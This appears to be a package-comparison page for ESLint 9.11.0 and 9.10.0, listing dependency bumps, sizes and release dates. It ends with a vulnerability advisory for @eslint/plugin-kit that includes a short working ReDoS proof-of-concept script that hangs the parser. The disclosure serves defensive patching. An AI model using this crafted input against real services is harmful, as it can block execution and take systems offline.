ESLint 9.11.0 and 9.10.0 are recent releases of the popular JavaScript linting tool, designed to help developers maintain code quality and consistency. Both versions share the same core functionality, offering AST-based pattern checking, customizable rules, and extensive integrations with various editors and build tools. However, several key differences might influence a developer's decision when upgrading.
First, reviewing the dependency updates, 9.11.0 includes a bump in @eslint/js from 9.10.0 to 9.11.0 and @eslint/plugin-kit jumps from 0.1.0 to 0.2.0. Also, @eslint/core bumps up from 0.5.0 to 0.6.0. These updates often contain bug fixes, performance improvements, and new features related to ESLint's core functionality and plugin development.
Additionally, there's a change in eslint-release dev dependency from 3.2.2 to 3.3.0. This usually reflects internal tooling upgrades, enhancing the release process.
Developers should also consider the file size and unpacked size differences. Version 9.11.0 has a file count of 419, unpacked size of 3297399, released 2024-09-20. Version 9.10.0 has a file count of 416, unpacked size of 3288062, released on 2024-09-06. These changes might indicate modifications to the codebase, potentially affecting performance or compatibility.
When choosing between versions, developers should prioritize understanding if the updated dependencies directly address any existing issues in their projects, or if the new features will significantly improve their linting workflow. Always review the changelog for a comprehensive understanding of changes. Finally, be aware of the added file size.
All the vulnerabilities related to the version 9.11.0 of the package
@eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser
The ConfigCommentParser#parseJSONLikeConfig API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.
The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with [^-a-zA-Z0-9/].
const { ConfigCommentParser } = require("@eslint/plugin-kit");
const str = `${"A".repeat(1000000)}?: 1 B: 2`;
console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseJSONLikeConfig(str));
console.log("end")
// run `npm i @eslint/plugin-kit@0.3.3` and `node attack.js`
// then the program will stuck forever with high CPU usage
This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.